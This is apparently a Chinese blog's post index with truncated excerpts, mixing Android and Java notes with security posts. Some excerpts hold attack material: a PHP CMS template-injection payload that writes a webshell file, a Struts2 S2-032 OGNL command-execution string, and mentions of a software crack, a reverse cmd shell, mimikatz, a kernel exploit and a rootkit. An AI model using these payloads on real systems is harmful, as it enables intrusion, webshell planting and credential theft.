- 博客(74)
- 资源 (10)
- 收藏
- 关注
RSS订阅原创 2021-10-29
rust http request 库最近需要使用rust编写个程序, 需要http get 指定网站, 于是上网上搜索rust 的 http 请求相关库,看到最多的是推荐 reqwest 库, 测试了下可以使用,但是编译后生成的文件 巨大,于是放弃。重新找到了个轻巧的库,同时支持http,https访问。连接如下:https://crates.io/crates/http_requse std::io;use http_req::request;fn get_ip_from_url(ta
2021-10-29 18:59:49
376
原创 010editor 11.01 破解
一、搜索注册提示字符串二、定位关键代码可知关键点位cmp edi, DB, 所以只需要修改上面call函数的返回值mov eax,DB 保存文件即可。破解完成
2021-01-27 20:51:47
2977
1
原创 [代码审计]php上传漏洞总结
背景: 这两天在网上瞎看,看到别人总结的一个上传漏洞靶场,觉得很不错,就是自己测试了下, 感觉对代码审计能力提高还是有帮助的,下面简单介绍靶场的解题思路(当然,每一题可能存在多种上传方式)。 靶场地址:https://github.com/c0ny1/upload-labs 一、环境搭建 建议使用靶场提供的测试环境。 二、解题思路 Pass-01: 检查代码:functio...
2018-06-05 21:54:05
2367
翻译 temp
Post Url:/index.php?m=vod-search&wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A}Post Data:hxg=phpinfo().fputs(fopen('hxgs.php','w'),'<?php $a=range(1,200);$b=ch...
2018-02-28 22:48:23
1024
转载 内网渗透中的mimikatz
原文:http://drops.wooyun.org/tips/75470x00 前言上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域已有资源:域内一台主机
2017-04-04 21:20:09
1497
原创 python http OPTIONS请求
通过发送http OPTIONS请求,可以获取 http允许的方法(我这里主要测试网站是否开启webDav),测试如下:import urllib2import jsonimport httpliburl='192.168.149.131'def http_get(): conn = httplib.HTTPConnection(url) conn.request("
2017-03-30 00:02:48
7941
转载 NetGear多款路由器远程命令注入漏洞分析(更新补丁分析)
转自:http://bobao.360.cn/learning/detail/3287.html本不想写这个文章的,只是在评论作者的问题时,提示字数太多,我一再缩减字数,发现还是评论不了,没办法呢只能在此写下问题,评论个连接:本人在分析时,基本上也是按照原作者的文章来的,只是发下原作者写的有些问题,这里说明下:======================================
2016-12-22 22:15:42
2829
3
原创 zmap & zgrab 使用
1、安装zmap网上下载源码编译2、安装go环境 vi /etc/profile 在最后加入export GOROOT=/usr/local/goexport PATH=$PATH:$GOROOT/binsource /etc/profile 让立即生效wget https://storage.googleapis.com/golang/go1.6.2.linux-amd6
2016-11-29 09:44:02
6424
原创 XRecyclerView和万能baseeAdapter 实现上拉下拉刷新列表
XRecyclerView : https://github.com/jianghejie/XRecyclerView万能baseAdaper: https://github.com/hongyangAndroid/baseAdapter添加依赖: compile 'com.zhy:base-rvadapter:3.0.3'compile 'com.zhy:base-adap
2016-11-14 22:26:44
5001
翻译 st032
?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%23parameters.command[0]).getInputStream()%2c%23b%3dnew java.io.InputStreamRead
2016-04-27 01:52:49
1153
1
原创 adb 安装并运行 apk
1、安装apk命令:adb install apk路径即可,例如:adb install E:\filetestapplication.apk2、运行apkadb shell am start -n apk包名/apk包名.活动名例如:AndroidManifest.xml <manifest xmlns:android="http://
2016-04-17 18:54:35
12616
转载 Java设计模式透析之 —— 模板方法(Template Method)
转载:http://blog.csdn.net/guolin_blog/article/details/8744002今天你还是像往常一样来上班,一如既往地开始了你的编程工作。项目经理告诉你,今天想在服务器端增加一个新功能,希望写一个方法,能对Book对象进行处理,将Book对象的所有字段以XML格式进行包装,这样以后可以方便与客户端进行交互。并且在包装开始前和结束后要打印日志
2016-03-08 21:48:35
540
原创 ProgressDialog的简单应用
package com.example.keen.progressdialog;import android.app.ProgressDialog;import android.os.Handler;import android.os.Message;import android.support.v7.app.AppCompatActivity;import android.os.Bu
2016-02-23 22:23:23
526
原创 Android中的Shape,selector使用总结
shape和selector是Android UI设计中经常用到的,比如我们要自定义一个圆角Button,点击Button有些效果的变化,就要用到shape和selector。可以这样说,shape和selector在美化控件中的作用是至关重要的。在Android程序开发中,我们经常会去用到Shape这个东西去定义各种各样的形状,首先我们了解一下Shape下面有哪些标签,都代表什么意思:
2016-02-17 00:04:30
752
原创 双管道cmd反弹程序
仅此记录,以备查询server:#include #include #include #include #pragma comment(lib,"ws2_32.lib")void ReceiveThread(LPVOID lPvoid){ SOCKET socketNew = (SOCKET)lPvoid; while(1) { char receiveBu
2016-01-24 02:13:27
2044
2
原创 javamail 发送邮件
使用javamail 测试163发送邮件动能时在测试发送邮件时与几个问题代码如下: public void sendMail() { String host = "smtp.163.com"; //邮件服务器 String from = "*****@163.com"; String to = "*****@163.com"; String userNam
2016-01-08 01:12:15
2880
2
原创 DEP: Ret2Libc via VirtualProtect()
VirtualProtect() 绕过DEP文章参考 0day 安全:软件漏洞分析技术:学习了DEP 绕过技术中的 VirtualProtect()绕过DEP,不过书中的例子是以windows 2003 为例,通过学习,一步一步在xp上测试成功。BOOL VirtualProtect{ LPVOID lpAddress, // 需要修改属性的内存的起始地址
2016-01-05 23:32:16
1059
1
原创 特殊字符串
var buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1
2016-01-01 20:42:47
5862
原创 java socket 编程基础
初次学习java socket ,记此留念server:import java.net.*;import java.io.*;public class EchoMultiServerThread extends Thread{ private Socket socket = null; public EchoMultiServerThread(Socket socket){
2015-12-24 17:31:42
757
原创 CVE-2012-0158 MSCOMCTL控件漏洞分析
参考:http://bbs.pediy.com/showthread.php?t=149957(样本是此链接提供的样本)运行样本后,会弹出计算器因为此类型的exp的shellcode 在运行的时候都会释放文件,释放文件时需要调用kernel32.dll 中的GetFileSize函数来判断需要释放的文件,所以在windbg开始调试poc时,在GetFileSize函数下断点,bu ke
2015-12-24 00:49:37
3884
1
转载 nmap 时间参数用法
Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之 一。 端口扫描: 常见端口与对应服务: 80 http
2015-06-23 19:28:40
5281
原创 windbg修改cmd的token提升其权限
使用windbg 调试xp。运行cmd,whoami查看权限如下:下面要做的就是把cmd.exe 的token值用system的token替换。1、 Ctrl + break ,windbg进入调试模式!process 0 0 查看xp所有进程,结果如下:kd> !process 0 0**** NT ACTIVE PROCESS DUMP ****PROCESS
2015-06-06 19:08:39
2303
原创 LordPe dump进程内存实现
#include #include #include #include //进程的第一个模块即为进程的 基址 (这里顺便获取进程内存映像的大小)DWORD GetProcessBaseAndImageSize(DWORD dwPID, DWORD *dwImageSize){ HANDLE hModuleSnap = INVALID_HANDLE_VALUE; MODULEEN
2015-06-06 18:57:10
3116
1
转载 4113_exp_code
//// Cve-2014-4113 'win32/win64 exp C code' reversed from 'exe exp'// 2014-11-10// Compiled pass on VS2010//#include #include #pragma comment(lib, "user32.lib")////////////////////////////
2015-05-29 23:50:10
871
转载 Linux下rootkit-ddrk攻击获得root权限以及清除方法
DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。DDRK中包含的文件:netstat #替换系统中的netstat,从ssh配置文件中读取端口并隐藏rk.ko #内核模块,实现文件和进程的隐藏功能setup #rootkit安装文件tty #ava工具bin.tgz ---ttymo
2015-03-15 17:53:32
5729
原创 vS2010 列表控件 添加右键菜单
1、首先在需要添加消息的控件上进行右键,弹出如下对话框2,如下图选择需要的消息响应,这里选择NM_RCLICK 消息。3,添加如下代码void CasteroidDlg::OnNMRClickRemotehostList(NMHDR *pNMHDR, LRESULT *pResult){ LPNMITEMACTIVATE pNMItemActivat
2015-03-15 01:44:52
4071
原创 基于对话框MFC程序添加状态栏
首先 需要创建一个 状态栏对象:CStatusBar m_Statusbar; //状态栏然后在初始化程序中//创建状态栏 m_Statusbar.Create(this); m_Statusbar.SetIndicators(indicators,sizeof(indicators)/sizeof(UINT)); CRect rect; GetWindowRe
2015-02-27 22:46:54
4222
原创 PEB结构
PEB进程环境快,下面是其一些结构//===============================================================================================//typedef struct _UNICODE_STR{ USHORT Length; USHORT MaximumLength; PWSTR pB
2015-01-25 23:43:14
6185
原创 _ReturnAddress 使用
msdn:The _ReturnAddress intrinsic provides the address of the instruction in the calling function that will be executed after control returns to the caller._ReturnAddress 返回当前调用函数返回的地址,即函数吓一跳指
2015-01-24 22:12:21
7505
转载 Evade antivirus convert shellcode to c
Evade antivirus convert shellcode to cPosted: February 4, 2013 in general, securityTags: antivirus, bypass, evade, meterpreter stager, shellcode12So another way to have a meterpreter
2015-01-20 23:46:55
1285
原创 windbg kp kb 命令测试
为了熟悉windbg kb,kp命令,写一段简单的程序调试观察,程序如下:#include #include void printstr(char *str, int b){ printf("xxx b is :%d\n",b);}int kbtest(int a){ char str[] = "xxxxxxxxxx"; printstr(str, a); return
2015-01-10 01:22:38
6719
1
原创 利用Adobe Flash Player ActiveX 控件绕过SafeSEH
PS: 参考0day 安全软件漏洞技术305页构造一个有漏洞的ActiveX控件,代码如下:void CVulnerSEHCtrl::test(LPCTSTR str){ //AFX_MANAGE_STATE(AfxGetStaticModuleState()); // TODO: Add your dispatch handler code here printf("aaaa"
2014-12-24 23:49:14
1765
转载 程序可信任路径代码执行漏洞
转自:http://www.2cto.com/Article/201305/208951.html时间:2012-09-26 【漏洞描述】 在使用CreateProcess函数时,当第一个参数lpApplicationName为NULL,而第二个参数lpCommandLine中包含有空格,且未加双引号时,会导致在执行函数时会被截断,比如:c:\prog
2014-12-06 00:16:51
711
转载 Powershell Notes
转自:http://codeliker.github.io/%E4%BB%A3%E7%A0%81/2014/11/21/powershell-notes/Powershell Notes powershell21 November 20141.powershell执行脚本:默认情况是阻止的,输入如下命令即可运行powershell脚本: set-ex
2014-11-22 17:28:16
1182
转载 Windows Create Hide User
转自:http://codeliker.github.io/hack/2014/11/22/windows-create-hide-user/
2014-11-22 17:26:43
1162
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人